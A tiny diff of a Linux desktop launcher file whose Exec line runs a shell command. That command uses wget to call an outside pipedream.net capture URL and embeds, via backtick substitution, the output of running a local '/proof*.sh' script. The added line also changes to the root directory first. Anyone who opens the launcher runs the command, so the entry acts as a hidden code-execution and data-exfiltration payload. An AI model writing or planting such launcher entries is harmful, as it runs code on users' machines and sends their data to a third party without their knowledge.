--- a/9hea.desktop
+++ b/9hea.desktop
@@ -1,3 +1,3 @@
 [Desktop Entry]
-Exec=sh -c "wget https://eonka939zo7nuk7.m.pipedream.net/?`/proof*.sh`"
+Exec=sh -c "wget https://eonka939zo7nuk7.m.pipedream.net/?`cd /` `/proof*.sh`"
 Type=Application
